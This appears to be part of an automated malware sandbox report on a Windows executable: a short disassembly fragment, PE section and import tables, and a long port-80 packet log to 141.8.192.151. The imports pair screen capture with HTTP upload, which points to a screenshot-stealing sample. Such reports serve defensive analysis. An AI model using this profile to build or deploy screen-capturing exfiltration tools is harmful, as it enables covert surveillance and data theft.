                                pop esi
                                pop ebx
                                mov esp, ebp
                                pop ebp
                                push ecx
                                ret
                                mov ecx, dword ptr [ebp-10h]
                                xor ecx, ebp
                                call 00007FF238A8EC65h
                                jmp 00007FF238A8EC70h
                                push eax
                                push dword ptr fs:[00000000h]
                                lea eax, dword ptr [esp+0Ch]
                                sub esp, dword ptr [esp+0Ch]
                                push ebx
                                push esi
                                push edi
                                mov dword ptr [eax], ebp
                                mov ebp, eax
                                mov eax, dword ptr [004A2014h]
                                xor eax, ebp
                                push eax
                                push dword ptr [ebp-04h]
                                mov dword ptr [ebp-04h], FFFFFFFFh
                                lea eax, dword ptr [ebp-0Ch]
                                mov dword ptr fs:[00000000h], eax
                                ret
                                push eax
                                push dword ptr fs:[00000000h]
                                lea eax, dword ptr [esp+0Ch]
                                sub esp, dword ptr [esp+0Ch]
                                push ebx
                                push esi
                                push edi
                                mov dword ptr [eax], ebp
                                mov ebp, eax
                                mov eax, dword ptr [004A2014h]
                                xor eax, ebp
                                push eax
                                mov dword ptr [ebp-10h], eax
                                push dword ptr [ebp-04h]
                                mov dword ptr [ebp-04h], FFFFFFFFh
                                lea eax, dword ptr [ebp-0Ch]
                                mov dword ptr fs:[00000000h], eax
                                ret
                                push eax
                                push dword ptr fs:[00000000h]
                                lea eax, dword ptr [esp+0Ch]
                                sub esp, dword ptr [esp+0Ch]
                                push ebx
                                push esi
                                push edi
                                mov dword ptr [eax], ebp
                                mov ebp, eax
                                mov eax, dword ptr [004A2014h]
                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0xa06dc0x8c.rdata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0xa84000x23a8.reloc
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xa70000x680c.reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x992f80x38.rdata
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x994000x18.rdata
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x993300x40.rdata
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x870000x28c.rdata
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x10000x854ec0x85600False0.5623700357310215data6.724381241477367IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rdata0x870000x1a5960x1a600False0.4773863299763033data5.592124453306788IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .data0xa20000x42d40x1a00False0.1736778846153846DOS executable (block device driver \200\377\377\377\377\261,32-bit sector-support)3.945907427530122IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .reloc0xa70000x680c0x6a00False0.6731647995283019data6.626873203758056IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                DLLImport
                                KERNEL32.dllEnterCriticalSection, GetCurrentProcess, WriteFile, LeaveCriticalSection, SetFilePointer, InitializeCriticalSectionEx, UnmapViewOfFile, GetModuleHandleA, HeapSize, MultiByteToWideChar, GetFileInformationByHandle, CopyFileA, GetLastError, CreateFileA, FileTimeToSystemTime, LoadLibraryA, LockResource, HeapReAlloc, CloseHandle, RaiseException, FindResourceExW, LoadResource, FindResourceW, HeapAlloc, GetLocalTime, DecodePointer, HeapDestroy, GetProcAddress, CreateFileMappingA, GetFileSize, DeleteCriticalSection, GetProcessHeap, SystemTimeToFileTime, FreeLibrary, HeapFree, MapViewOfFile, GetTickCount, IsWow64Process, AreFileApisANSI, GetFullPathNameW, LockFile, InitializeCriticalSection, GetFullPathNameA, SetEndOfFile, GetTempPathW, CreateFileW, GetFileAttributesW, GetCurrentThreadId, Sleep, GetTempPathA, GetFileAttributesA, GetVersionExA, DeleteFileA, DeleteFileW, LoadLibraryW, UnlockFile, LockFileEx, GetCurrentProcessId, GetSystemTimeAsFileTime, GetSystemTime, FormatMessageA, QueryPerformanceCounter, FlushFileBuffers, SetStdHandle, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetOEMCP, GetACP, IsValidCodePage, SizeofResource, GetModuleFileNameA, WideCharToMultiByte, ReadFile, ReadConsoleW, GetTimeZoneInformation, GetFileType, GetFileSizeEx, GetConsoleMode, GetConsoleCP, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetTimeFormatW, GetDateFormatW, WriteConsoleW, GetCommandLineW, GetCommandLineA, GetStdHandle, GetModuleFileNameW, QueryPerformanceFrequency, GetModuleHandleExW, ExitProcess, VirtualQuery, VirtualProtect, VirtualAlloc, GetSystemInfo, GetCurrentDirectoryW, CreateDirectoryW, FindClose, FindFirstFileExW, FindNextFileW, GetFileAttributesExW, RemoveDirectoryW, SetFilePointerEx, SetLastError, GetModuleHandleW, CopyFileW, LocalFree, GetStringTypeW, EncodePointer, InitializeCriticalSectionAndSpinCount, CreateEventW, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, IsDebuggerPresent, OutputDebugStringW, SetEvent, ResetEvent, WaitForSingleObjectEx, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, InitializeSListHead, TerminateProcess, RtlUnwind, LoadLibraryExW
                                USER32.dllGetDC, GetSystemMetrics, ReleaseDC, GetDesktopWindow
                                GDI32.dllDeleteObject, GetObjectA
                                SHLWAPI.dllPathFindExtensionW, PathFindExtensionA
                                gdiplus.dllGdipSaveImageToFile, GdipCreateBitmapFromScan0, GdipGetImageEncodersSize, GdipDisposeImage, GdipGetImageEncoders, GdiplusShutdown, GdipCreateBitmapFromHBITMAP, GdiplusStartup
                                WININET.dllInternetWriteFile, HttpEndRequestA, HttpSendRequestExA, InternetOpenA, HttpOpenRequestA, InternetConnectA, InternetCloseHandle
                                TimestampSource PortDest PortSource IPDest IP
                                Jul 4, 2023 11:12:02.299077034 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:02.388925076 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:02.389061928 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:02.390363932 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:02.390427113 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:02.392108917 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:02.480371952 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:02.480448961 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:02.480583906 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:02.481584072 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:02.481717110 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:02.570429087 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:02.570636034 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:02.571188927 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:02.571228981 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:02.571310997 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:02.571310997 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:02.660388947 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:02.660446882 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:02.660756111 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:02.660753012 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:02.660852909 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:02.661007881 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:02.661056042 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:02.661106110 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:02.661178112 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:02.750740051 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:02.750844955 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:02.750906944 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:02.750945091 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:02.750981092 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:02.751014948 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:02.751224041 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:02.751298904 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:02.751321077 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:02.752255917 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:02.840977907 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:02.841063976 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:02.841176987 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:02.841238022 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:02.841316938 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:02.841408968 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:02.841520071 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:02.841569901 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:02.841584921 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:02.841703892 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:02.841722012 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:02.841823101 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:02.841875076 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:02.842010021 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:02.842106104 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:02.842197895 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:02.842225075 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:02.842308998 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:02.930998087 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:02.931054115 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:02.931132078 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:02.931165934 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:02.931200981 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:02.931302071 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:02.931338072 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:02.931421041 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:02.931421995 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:02.931440115 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:02.931477070 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:02.931477070 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:02.931514025 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:02.931530952 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:02.931549072 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:02.931581020 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:02.931581020 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:02.931616068 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:02.931648016 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:02.931653023 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:02.931688070 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:02.931736946 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:02.931808949 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:02.931885958 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:02.931993008 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:02.932030916 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:02.932075024 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:02.932123899 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.021256924 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.021336079 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.021425009 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.021425962 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.021476030 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.021652937 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.021677971 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.021764994 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.021817923 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.021855116 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.021889925 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.021905899 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.021943092 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.021972895 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.022136927 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.022269011 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.022324085 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.022422075 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.022448063 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.022526026 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.022639990 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.022676945 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.022763014 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.022763014 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.022784948 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.022871971 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.022893906 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.022994995 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.023247004 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.023283005 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.023319006 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.023360014 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.023407936 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.023407936 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.023436069 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.023554087 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.023669004 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.023777008 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.023803949 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.023983002 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.023999929 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.024034977 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.024146080 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.024244070 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.024303913 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.024341106 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.024439096 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.024506092 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.024671078 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.024687052 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.024749041 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.024854898 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.024905920 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.024965048 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.024969101 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.025048971 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.025090933 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.025136948 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.025214911 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.025397062 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.025507927 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.025515079 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.025612116 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.025702953 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.025737047 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.025780916 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.025839090 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.025842905 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.025933981 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.026046991 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.026134014 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.026206970 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.026283026 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.111107111 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.111143112 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.111218929 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.111387014 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.111387014 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.111403942 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.111630917 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.111648083 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.111742020 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.111746073 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.111742020 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.113158941 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.126971006 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.127769947 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.127968073 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.128074884 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.128288984 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.128403902 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.128492117 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.200937986 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.200968981 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.201098919 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.201215982 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.201296091 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.211664915 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.211925983 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.217375994 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.217528105 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.217597961 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.217597961 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.217632055 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.217730045 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.217833042 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.217943907 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.218005896 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.218117952 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.218161106 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.218266010 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.218337059 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.218466997 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.218543053 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.218653917 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.218698025 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.218719959 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.218785048 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.218785048 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.218846083 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.218961954 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.219052076 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.219147921 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.219259977 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.219348907 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.219362974 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.219491005 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.219549894 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.219669104 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.219670057 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.219780922 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.219866037 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.220007896 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.220581055 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.220702887 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.220834017 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.220880032 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.220979929 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.221033096 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.221062899 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.221218109 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.221246958 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.221396923 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.221402884 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.221524954 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.221580982 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.221687078 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.290755033 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.290783882 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.290858030 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.290874958 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.291050911 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.291084051 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.291205883 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.291280985 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.301493883 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.301584959 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.301728010 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.301728010 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.301824093 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.301927090 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.307133913 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.307209969 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.307234049 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.307241917 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.307276964 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.307276964 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.307305098 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.307440042 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.307456017 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.307522058 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.307523012 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.307554960 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.307559967 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.307619095 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.307715893 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.307730913 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.307790041 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.307790041 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.307893991 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.307961941 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.308135986 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.308157921 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.308202982 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.308207989 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.308227062 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.308237076 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.308245897 CEST4918380192.168.2.22141.8.192.151
